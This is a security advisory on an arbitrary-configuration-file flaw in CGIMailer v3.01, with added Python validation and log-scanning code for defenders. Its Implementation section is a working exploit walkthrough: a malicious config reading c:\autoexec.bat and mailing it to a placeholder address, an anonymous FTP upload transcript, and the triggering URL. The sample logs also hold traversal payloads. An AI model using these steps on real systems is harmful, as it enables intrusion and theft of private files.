Advisory: CGIMailer v3.01 for Windows 95/98/2000/NT4.0
Chopsui-cide[MmM]
The Mad Midget Mafia - http://midgets.box.sk/
=======================================================================

Summary:
==========
Date released: 15/03/2000 (dd/mm/yyyy).
Risk: reading of private files.
Vulnerability found by: Chopsui-cide.
Vulnerable: CGIMailer v3.01, probably prior versions (not tested).
Immune: ?

CGIMailer makes use of configuration files which specify certain
variables (address to post to, etc). An attacker can specify his/her
own configuration file.

Details:
==========
Anyone who can execute CGIMailer (anyone who can use the forms that use
CGIMailer) can specify which configuration file to use, and this can
be any file on the system CGIMailer is running on. This allows the
existence of private files on that system to be detected.
There are more dangerous implications though: this vulnerability could
possibly be exploited to obtain private files from the target system.
If there is an FTP server running on the target system on which an
attacker has upload privileges, he/she could upload a malicious
configuration file, and then run it using CGIMailer. Configuration
files can be used to send files to the attacker via e-mail (among
other things).
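The two fixes a defender would want here, as an added Python example that is not CGIMailer's own code: treat the query-string value as a bare configuration name that is confined to one fixed directory, and apply the same confinement to file-referencing keys such as RESPONSE_TEMPLATE when the configuration file is parsed. The directory paths are assumptions made for the example; the sample configuration text is the one shown in this advisory.

```python
import ntpath

# Hypothetical directories for this example; CGIMailer's real layout is not
# described in the advisory.
CONFIG_ROOT = r"C:\inetpub\cgimailer\configs"
TEMPLATE_ROOT = r"C:\inetpub\cgimailer\templates"

# The configuration file from the advisory: RESPONSE_TEMPLATE points at an
# arbitrary file, which is exactly what validate_config() must refuse.
ADVISORY_CONFIG = r"""GATEWAY=notneeded.com
PORT=25
FROM=nobody@isp.com
TO=nobody@isp.com
SUBJECT=CGIMailer form
RESPONSE_TEMPLATE=c:\autoexec.bat
REFBASE_ALLOW=
"""


class ConfigRejected(ValueError):
    """Raised when a user-controlled name would reach a file it must not."""


def _bare_name(value: str) -> str:
    """Accept only a plain file name: no separators, drive letters or '..'."""
    if not value or value.startswith("."):
        raise ConfigRejected(f"empty or hidden name: {value!r}")
    if any(ch in value for ch in "\\/:") or ".." in value:
        raise ConfigRejected(f"path components not allowed: {value!r}")
    if not all(ch.isalnum() or ch in "-_." for ch in value):
        raise ConfigRejected(f"illegal character in name: {value!r}")
    return value


def _confine(root: str, name: str) -> str:
    """Join name to root and verify the normalised result stays inside root."""
    root = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root, name))
    if ntpath.commonpath([root, candidate]) != root:
        raise ConfigRejected(f"{candidate!r} escapes {root!r}")
    return candidate


def resolve_config(requested: str, config_root: str = CONFIG_ROOT) -> str:
    """Map the query-string value to a .cf file under config_root.

    The vulnerable behaviour is to open whatever path the query string names;
    here the value is treated as a bare name and a fixed suffix is appended.
    """
    name = _bare_name(requested)
    if "." in name:
        raise ConfigRejected("configuration names carry no extension")
    return _confine(config_root, name + ".cf")


def parse_config(text: str) -> dict:
    """Parse KEY=VALUE lines of the kind shown in the advisory."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        cfg[key.strip().upper()] = value.strip()
    return cfg


def validate_config(cfg: dict, template_root: str = TEMPLATE_ROOT) -> dict:
    """Confine file-referencing keys so a config cannot read arbitrary files."""
    checked = dict(cfg)
    template = cfg.get("RESPONSE_TEMPLATE", "")
    if template:
        checked["RESPONSE_TEMPLATE"] = _confine(template_root, _bare_name(template))
    return checked


def is_rejected(func, *args) -> bool:
    """Helper for callers that want a boolean instead of an exception."""
    try:
        func(*args)
    except ConfigRejected:
        return True
    return False


if __name__ == "__main__":
    print(resolve_config("contact"))
    print("advisory query rejected:", is_rejected(resolve_config, r"d:\ftproot\incoming\test.cf"))
    print("advisory config rejected:", is_rejected(validate_config, parse_config(ADVISORY_CONFIG)))
```

The containment check after normalisation matters even once separators are refused: it is the backstop if the character filter is ever loosened, and it is the check that catches a name that normalises to something outside the root.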

Implementation:
=================
To demonstrate this problem, I set up Xitami Webserver + Serv-U FTP 2.5d.
The target host is therocksays.

We have anonymous FTP access in Serv-U FTP with upload privileges to
the incoming directory, and Xitami will allow us to execute CGI
scripts. This is all we will need to execute the attack.

Here is the configuration file that will send us the contents of
autoexec.bat:

GATEWAY=notneeded.com
PORT=25
FROM=nobody@isp.com
TO=nobody@isp.com
SUBJECT=CGIMailer form
RESPONSE_TEMPLATE=c:\autoexec.bat
REFBASE_ALLOW=

Now to upload it...

D:\>ftp therocksays
Connected to therocksays.
220 Serv-U FTP-Server v2.5d for WinSock ready...
User (therocksays:(none)): anonymous
331 User name okay, please send complete E-mail address as password.
Password:
230 User logged in, proceed.
ftp> dir
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
drwxrwxrwx   1 user     group           0 Mar 15 06:28 incoming
226 Transfer complete.
65 bytes received in 0.00 seconds (65000.00 Kbytes/sec)
ftp> cd incoming
250 Directory changed to /d:/ftproot/incoming
ftp> put test.cf
200 PORT Command successful.
150 Opening ASCII mode data connection for test.cf.
226 Transfer complete.
150 bytes sent in 0.06 seconds (2.50 Kbytes/sec)
ftp> pwd
257 "/d:/ftproot/incoming" is current directory.
ftp>

Serv-U was even kind enough to give us the local path of the config
file. Now all we need to do is point our browser at:
http://therocksays/cgi-bin/cgimail?d:\ftproot\incoming\test.cf

The contents of autoexec.bat should be listed at the top of the
resulting HTML file. This could have been e-mailed as an attachment
to any address we wanted.
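For detection after the fact, the request above leaves a distinctive trace in the web server's access log: the cgimail query string carries a drive letter or path separators instead of a bare configuration name. The following scanner is an added Python example, not part of the advisory, of CGIMailer or of Xitami; the log lines are constructed in Common Log Format, and the flagged query in the second line is the one used in this walkthrough.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not real logs from
# the advisory's test host.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [15/Mar/2000:06:40:01 +0000] "GET /cgi-bin/cgimail?contact HTTP/1.0" 200 512',
    '10.0.0.9 - - [15/Mar/2000:06:41:17 +0000] "GET /cgi-bin/cgimail?d:\\ftproot\\incoming\\test.cf HTTP/1.0" 200 2048',
    '10.0.0.9 - - [15/Mar/2000:06:42:03 +0000] "GET /cgi-bin/cgimail?..%2F..%2Fwinnt%2Fwin.ini HTTP/1.0" 200 1890',
    '10.0.0.7 - - [15/Mar/2000:06:43:44 +0000] "GET /index.html HTTP/1.0" 200 1201',
]

# Minimal CLF parser: client, timestamp, method, request target, status, size.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each check names one way a query string stops being a bare config name.
SUSPICIOUS = [
    ("drive letter", re.compile(r"^[A-Za-z]:")),
    ("unc path", re.compile(r"^\\\\")),
    ("path separator", re.compile(r"[\\/]")),
    ("parent traversal", re.compile(r"\.\.")),
]


def classify_query(query: str) -> list:
    """Return the names of all checks the (URL-decoded) query string trips."""
    decoded = unquote(query)
    return [name for name, rx in SUSPICIOUS if rx.search(decoded)]


def scan_access_log(lines, script_name: str = "cgimail") -> list:
    """Flag requests to script_name whose query string looks like a file path."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        # Only requests to the CGI itself are of interest.
        if path.rsplit("/", 1)[-1].lower() != script_name:
            continue
        reasons = classify_query(query)
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "query": unquote(query),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ts']} {f['ip']} query={f['query']!r} reasons={', '.join(f['reasons'])}")
```

Decoding the query before matching is what catches the percent-encoded variant in the third line; matching on the raw log text would miss it. A request flagged this way that is followed by outbound mail from the CGIMailer host is the sequence the Details section describes, and the FTP server's upload log for the same client address completes the picture.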

=======================================================================